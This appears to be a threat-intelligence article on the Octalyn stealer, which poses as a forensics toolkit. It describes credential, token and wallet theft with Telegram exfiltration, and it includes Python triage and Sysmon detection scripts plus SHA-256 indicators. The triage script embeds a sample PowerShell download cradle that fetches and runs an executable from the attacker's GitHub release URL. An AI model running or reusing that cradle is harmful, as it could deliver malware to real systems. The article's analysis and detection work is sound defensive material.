Octalyn Stealer Harvests VPN Configs, Passwords, and Cookies in Organized Folder Structure

The Octalyn Forensic Toolkit, openly hosted on GitHub, has been exposed as a fully fledged credential stealer that presents itself as a red-teaming and digital-forensics research tool.

The toolkit pairs a C++ payload module with a Delphi-built graphical user interface (GUI) builder, which lowers the barrier for threat actors by reducing payload generation to a few clicks.

Users need only input a Telegram bot token and chat ID to create fully functional binaries capable of real-time data exfiltration.

Despite its stated educational purpose, static analysis shows that its core functionality targets sensitive data: saved passwords, cookies, and autofill entries from browsers such as Google Chrome, Microsoft Edge, and Opera.

Modular Design Enables Easy Credential Theft

The stealer also extracts Discord and Telegram tokens, VPN configurations, gaming account details, and cryptocurrency wallet artifacts such as addresses, private keys, seed phrases, wallet.dat files, and browser extension data for assets like Bitcoin, Ethereum, Litecoin, and Monero.

Once executed, the payload establishes persistence through Windows Startup folder entries and a registry value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, so that it relaunches automatically at each user logon.

Entropy scores above 7 (on the 0 to 8 Shannon scale) for components such as Build.exe indicate heavy obfuscation, padded with junk data, intended to hinder reverse engineering. Embedded resources drop additional executables (TelegramBuild.exe, rvn.exe, and assembly.exe) into the %TEMP% directory, which is located with GetTempPathA; they are then launched with ShellExecuteA with the window hidden.

Build.exe Acts as a Dropper

Dynamic analysis further reveals Octalyn's exfiltration mechanism: stolen data is staged in a structured tree under %TEMP%\Octalyn, with subdirectories for Crypto wallets, VPN, Browsers, Discord, Games, and Socials.

Files such as All_browsers_cookies.txt, autofill.txt, bookmarks.txt, discord.txt, history.txt, and passwords.txt collect the harvested data in a form that is easy for the attacker to parse, enabling session hijacking, victim profiling, or further exploitation.

Secondary Payload Risks Amplify Threat

After collection, a PowerShell script compresses the staged data into a ZIP archive named after the victim's username with the suffix OctalynRetrieved.zip and uploads it over a TLS connection to api.telegram.org, where the attacker's bot receives it.

According to the Cyfirma report, because the traffic is TLS-encrypted and destined for a legitimate, widely used domain, it blends in with normal network activity and evades inspection; the same channel can also carry commands from the attacker's Telegram infrastructure.

Figure: Octalyn Stealer (TelegramBuild.exe)

In addition, a Base64-encoded PowerShell command (UTF-16LE text encoded to Base64, the format PowerShell's -EncodedCommand switch expects), run with its window hidden via SW_HIDE, attempts to download a secondary payload from a GitHub release URL (https://github.com/git-user691/psycho/releases/download/v1/rundll32.exe) and save it as winlogon.exe.

The file was not available at the time of analysis, but the repository remains live, so it could be used to deliver a malicious payload later.
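Because the downloader is a hidden, Base64-encoded PowerShell command, the first triage step on a suspect process command line is to decode it and pull out the URLs and file names it references. The following is an added example written for this article, not code from the Cyfirma report or from the Octalyn repository: it reproduces the exact encoding PowerShell's -EncodedCommand switch uses (UTF-16LE, then Base64), decodes it, and flags download cradles and hidden-window execution. The sample command is a constructed reconstruction shaped like the one described above (the report does not print the decoded text); the URL and the winlogon.exe name come from the report, everything else in it is assumed.

```python
import base64
import re

# Constructed sample: a download cradle of the shape the report describes
# (GitHub release URL fetched and dropped as winlogon.exe). The report does not
# print the decoded command, so the exact text here is an assumption.
SAMPLE_COMMAND = (
    "$u='https://github.com/git-user691/psycho/releases/download/v1/rundll32.exe';"
    "$p=Join-Path $env:TEMP 'winlogon.exe';"
    "Invoke-WebRequest -Uri $u -OutFile $p;"
    "Start-Process -FilePath $p -WindowStyle Hidden"
)

# Common spellings of the switch; PowerShell also accepts other unambiguous
# prefixes of 'EncodedCommand', which this pattern does not try to cover.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.I)
EXE_RE = re.compile(r"[\w.-]+\.exe\b", re.I)
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)
HIDDEN_RE = re.compile(r"-WindowStyle\s+Hidden|\bSW_HIDE\b", re.I)


def encode_powershell(command):
    """Encode a command exactly as powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded):
    """Reverse of encode_powershell; raises ValueError on malformed input."""
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("not a UTF-16LE payload (odd byte length)")
    return raw.decode("utf-16-le")


def extract_encoded(cmdline):
    """Return the Base64 argument of an -EncodedCommand switch, or None."""
    m = ENC_FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def triage(cmdline):
    """Decode a suspect command line and summarise what the payload does."""
    encoded = extract_encoded(cmdline)
    if encoded is None:
        return None
    cmd = decode_powershell(encoded)
    return {
        "command": cmd,
        "urls": URL_RE.findall(cmd),
        "exe_names": sorted({m.lower() for m in EXE_RE.findall(cmd)}),
        "download_cradle": bool(CRADLE_RE.search(cmd)),
        "hidden_window": bool(HIDDEN_RE.search(cmd)),
    }


if __name__ == "__main__":
    line = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(SAMPLE_COMMAND)
    for key, value in triage(line).items():
        print(f"{key}: {value}")
```

Feed it the CommandLine field from process-creation telemetry; a result with a URL, a download cradle and a hidden window, where the referenced executable name (winlogon.exe here) does not match the file name in the URL (rundll32.exe), is the pattern described in this section.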

The toolkit's Winsock-based networking, modular design, and lightweight build make it both evasive and accessible. Its behaviour maps to the MITRE ATT&CK techniques Credentials from Password Stores (T1555), Registry Run Keys / Startup Folder (T1547.001), and Exfiltration Over C2 Channel (T1041).

Last updated three months before the report, Octalyn's focus on financial assets and its secondary downloader point to deliberate malicious engineering, despite the developer's forensic narrative.

Metadata from repository files even exposed the author’s PC username, underscoring operational security lapses.

Security teams should monitor for executables dropped into %TEMP% and for the %TEMP%\Octalyn staging directory, for new Run-key values and Startup-folder entries, and for connections to api.telegram.org from processes that are not a Telegram client, to mitigate risks from this abuse-prone tool.
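The monitoring advice above translates into a handful of host-telemetry rules. The following is an added example written for this article, not code from the Cyfirma report or from the Octalyn project: it runs rules for the behaviours described in this section (named components dropped into %TEMP%, the %TEMP%\Octalyn staging tree and the OctalynRetrieved.zip archive, a Run-key value pointing into %TEMP%, a Startup-folder write, api.telegram.org connections from a non-Telegram process, and matches against the SHA-256 values from the IOC table below) over a constructed set of Sysmon-style JSON events. The event layout, the Run value name "Octalyn", the victim username, the archive name separator and the Telegram-client allowlist are assumptions; the hashes, file names, paths and domain are from the report.

```python
import json
import re

# SHA-256 values from the report's IOC table, keyed to the file names listed there.
IOC_SHA256 = {
    "8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b": "Octalynstealer.exe",
    "3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828": "Build.exe",
    "8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34": "rvn.exe",
    "cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a": "assembly.exe",
    "8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2": "TelegramBuild.exe",
    "abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e": "svchost.exe",
    "44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7": "binder.exe",
}

TEMP_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
DROPPED_RE = re.compile(r"\\(?:TelegramBuild|rvn|assembly)\.exe$", re.I)
STAGING_RE = re.compile(r"\\Octalyn\\|OctalynRetrieved\.zip$", re.I)
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Assumed allowlist: the official desktop client legitimately talks to api.telegram.org.
TELEGRAM_CLIENTS = {"telegram.exe"}


def parse_hashes(field):
    """Split a Sysmon 'Hashes' field ('SHA256=..,MD5=..') into {algo: lowercase hex}."""
    out = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().upper()] = value.strip().lower()
    return out


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the rule names a single event trips (empty list if benign)."""
    hits = []
    eid = ev.get("EventID")
    if eid == 1:  # process create: compare the image hash with the IOC list
        sha = parse_hashes(ev.get("Hashes", "")).get("SHA256", "")
        if sha in IOC_SHA256:
            hits.append("ioc_hash_match:" + IOC_SHA256[sha])
    elif eid == 11:  # file create
        path = ev.get("TargetFilename", "")
        if TEMP_RE.search(path) and DROPPED_RE.search(path):
            hits.append("dropped_component_in_temp")
        if STAGING_RE.search(path):
            hits.append("octalyn_staging_or_archive")
        if STARTUP_RE.search(path):
            hits.append("startup_folder_persistence")
    elif eid == 13:  # registry value set: Run key whose data points into %TEMP%
        if RUN_KEY_RE.search(ev.get("TargetObject", "")) and TEMP_RE.search(ev.get("Details", "")):
            hits.append("run_key_points_into_temp")
    elif eid == 3:  # network connection
        if (ev.get("DestinationHostname", "").lower() == "api.telegram.org"
                and basename(ev.get("Image", "")) not in TELEGRAM_CLIENTS):
            hits.append("telegram_bot_api_from_unexpected_process")
    return hits


def scan(lines):
    """Parse JSON-per-line events and return (rule, process, detail) alerts."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in check_event(ev):
            detail = (ev.get("TargetFilename") or ev.get("TargetObject")
                      or ev.get("DestinationHostname") or ev.get("Image", ""))
            alerts.append((rule, basename(ev.get("Image", "")), detail))
    return alerts


# Constructed sample telemetry (Sysmon field names; paths and names assumed).
_T = "C:\\Users\\victim\\AppData\\Local\\Temp\\"
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\victim\\Downloads\\Build.exe",
     "Hashes": "SHA256=3B3A096A9C507529919F92154F682490FA8E135F3460549A917CF23113A7B828,MD5=0"},
    {"EventID": 11, "Image": "C:\\Users\\victim\\Downloads\\Build.exe", "TargetFilename": _T + "TelegramBuild.exe"},
    {"EventID": 13, "Image": _T + "TelegramBuild.exe",
     "TargetObject": "HKU\\S-1-5-21-1-2-3-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Octalyn",
     "Details": _T + "TelegramBuild.exe"},
    {"EventID": 11, "Image": _T + "TelegramBuild.exe", "TargetFilename": _T + "Octalyn\\Browsers\\passwords.txt"},
    {"EventID": 11, "Image": _PS, "TargetFilename": _T + "victim_OctalynRetrieved.zip"},
    {"EventID": 3, "Image": _PS, "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventID": 3, "Image": _CHROME, "DestinationHostname": "www.google.com", "DestinationPort": 443},
    {"EventID": 11, "Image": _CHROME, "TargetFilename": _T + "chrome_installer.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for rule, proc, detail in scan(SAMPLE_LOG.splitlines()):
        print(f"{rule:45} {proc:20} {detail}")
```

The benign Chrome events produce no alerts, which is the point of tying each rule to a second condition (a Temp path plus a known dropped name, a Run value plus Temp data, the Telegram domain plus an unexpected process) rather than alerting on %TEMP% writes or Telegram traffic alone.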

Indicators of Compromise

No. SHA-256 hash Type Context
1. 8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b EXE Octalynstealer.exe
2. 3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828 DLL Build.exe
3. 8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34 EXE rvn.exe
4. cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a EXE assembly.exe
5. 8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2 EXE TelegramBuild.exe
6. abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e EXE svchost.exe
7. 44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7 EXE binder.exe
